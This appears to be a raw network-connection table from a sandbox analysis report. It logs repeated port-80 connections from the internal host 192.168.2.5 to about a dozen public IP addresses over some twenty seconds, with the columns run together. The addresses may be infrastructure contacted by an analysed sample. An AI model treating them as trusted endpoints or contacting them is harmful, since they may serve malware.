                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.194593906 CET805005018.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.194813013 CET5005080192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.201499939 CET805005018.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.201565027 CET5005080192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.648260117 CET5005180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.654150963 CET805005118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.654253960 CET5005180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.654402971 CET5005180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.654433966 CET5005180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.659960985 CET805005118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.659976006 CET805005118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.322695017 CET805005118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.323013067 CET5005180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.329243898 CET805005118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.329308987 CET5005180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.336673975 CET5005280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.342303038 CET805005244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.342381954 CET5005280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.342493057 CET5005280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.342518091 CET5005280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.347971916 CET805005244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.348042965 CET805005244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.040076017 CET805005244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.040245056 CET5005280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.046431065 CET805005244.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.046494007 CET5005280192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.063070059 CET5005380192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.068507910 CET805005372.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.068566084 CET5005380192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.068813086 CET5005380192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.068835020 CET5005380192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.074172974 CET805005372.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.074187040 CET805005372.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.902734041 CET805005372.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.902880907 CET5005380192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.902934074 CET5005380192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.906598091 CET5005480192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.908469915 CET805005372.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.912101030 CET805005472.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.912192106 CET5005480192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.912318945 CET5005480192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.912353992 CET5005480192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.917836905 CET805005472.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.917869091 CET805005472.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.725184917 CET805005472.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.725276947 CET5005480192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.725627899 CET5005480192.168.2.572.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.731724977 CET805005472.52.178.23192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.741964102 CET5005580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.748025894 CET805005544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.748111010 CET5005580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.748231888 CET5005580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.748266935 CET5005580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.753669024 CET805005544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.754019976 CET805005544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.424982071 CET805005544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.425162077 CET5005580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.434840918 CET805005544.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.434911966 CET5005580192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.439990044 CET5005680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.445496082 CET805005618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.445581913 CET5005680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.445733070 CET5005680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.445733070 CET5005680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.451330900 CET805005618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.451361895 CET805005618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.889324903 CET805005618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.889576912 CET5005680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.895925045 CET805005618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.896013021 CET5005680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.904447079 CET5005780192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.909997940 CET805005718.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.910074949 CET5005780192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.910176039 CET5005780192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.910197973 CET5005780192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.915535927 CET805005718.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.915559053 CET805005718.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.563652992 CET805005718.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.563950062 CET5005780192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.569696903 CET805005718.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.569758892 CET5005780192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.579511881 CET5005880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.585053921 CET8050058172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.585254908 CET5005880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.585447073 CET5005880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.585484982 CET5005880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.591012001 CET8050058172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.591032982 CET8050058172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:02.239166975 CET8050058172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:02.239269018 CET5005880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:02.239331961 CET5005880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:02.240437031 CET5005980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:02.244837046 CET8050058172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:02.245884895 CET8050059172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:02.245980024 CET5005980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:02.246095896 CET5005980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:02.246130943 CET5005980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:02.251513004 CET8050059172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:02.251575947 CET8050059172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:02.930613041 CET8050059172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:02.930711031 CET5005980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:03.047749043 CET5005980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:03.053343058 CET8050059172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:03.154850006 CET5006080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:03.160995007 CET805006054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:03.161083937 CET5006080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:03.162542105 CET5006080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:03.162570953 CET5006080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:03.168184996 CET805006054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:03.169024944 CET805006054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.176521063 CET805006054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.176780939 CET805006054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.176959991 CET805006054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.176964045 CET5006080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.177002907 CET5006080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.177002907 CET5006080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.182749033 CET805006054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.194262981 CET5006180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.199984074 CET805006144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.200179100 CET5006180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.200233936 CET5006180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.200253963 CET5006180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.205648899 CET805006144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.206290007 CET805006144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.877710104 CET805006144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.877973080 CET5006180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.884352922 CET805006144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.884426117 CET5006180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.895970106 CET5006280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.901796103 CET805006234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.901994944 CET5006280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.902137995 CET5006280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.902153969 CET5006280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.907531977 CET805006234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.908015013 CET805006234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.731158018 CET805006234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.731542110 CET5006280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.737680912 CET805006234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.737797976 CET5006280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.847337008 CET5006380192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.853061914 CET805006334.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.853166103 CET5006380192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.856065035 CET5006380192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.856118917 CET5006380192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.861463070 CET805006334.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.861660004 CET805006334.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.679814100 CET805006334.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.680195093 CET5006380192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.688065052 CET805006334.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.688142061 CET5006380192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.882041931 CET5006480192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.887557030 CET805006434.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.887651920 CET5006480192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.887774944 CET5006480192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.887804985 CET5006480192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.893213034 CET805006434.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.893250942 CET805006434.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.864963055 CET805006434.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.868782043 CET5006480192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.875051975 CET805006434.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.875129938 CET5006480192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.887623072 CET5006580192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.893210888 CET805006518.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.893280029 CET5006580192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.893467903 CET5006580192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.893503904 CET5006580192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.899084091 CET805006518.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.899142981 CET805006518.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.790822983 CET805006518.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.791062117 CET5006580192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.803889036 CET805006518.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.803992987 CET5006580192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.807908058 CET5006680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.813678980 CET805006647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.813774109 CET5006680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.813956976 CET5006680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.813987017 CET5006680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.819514990 CET805006647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.820050955 CET805006647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.247664928 CET805006647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.247998953 CET5006680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.254595995 CET805006647.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.254684925 CET5006680192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.364406109 CET5006780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.371494055 CET805006713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.371582985 CET5006780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.371886015 CET5006780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.371917963 CET5006780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.377883911 CET805006713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.378479004 CET805006713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.836721897 CET805006713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.837136030 CET5006780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.842998028 CET805006713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.843075991 CET5006780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.853681087 CET5006880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.859380960 CET805006818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.859469891 CET5006880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.859622955 CET5006880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.859649897 CET5006880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.865607977 CET805006818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:11.866082907 CET805006818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.522706032 CET805006818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.523103952 CET5006880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.529578924 CET805006818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.529659033 CET5006880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.541495085 CET5006980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.547427893 CET805006944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.547885895 CET5006980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.548007011 CET5006980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.548091888 CET5006980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.553875923 CET805006944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:12.553915024 CET805006944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.222980022 CET805006944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.223212957 CET5006980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.230946064 CET805006944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.231184006 CET5006980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.330342054 CET5007080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.336154938 CET805007018.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.336245060 CET5007080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.336462975 CET5007080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.336535931 CET5007080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.341907024 CET805007018.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.342564106 CET805007018.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.998702049 CET805007018.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:13.998883963 CET5007080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:14.004847050 CET805007018.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:14.004909039 CET5007080192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:14.014271021 CET5007180192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:14.019853115 CET805007147.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:14.019922972 CET5007180192.168.2.547.129.31.212
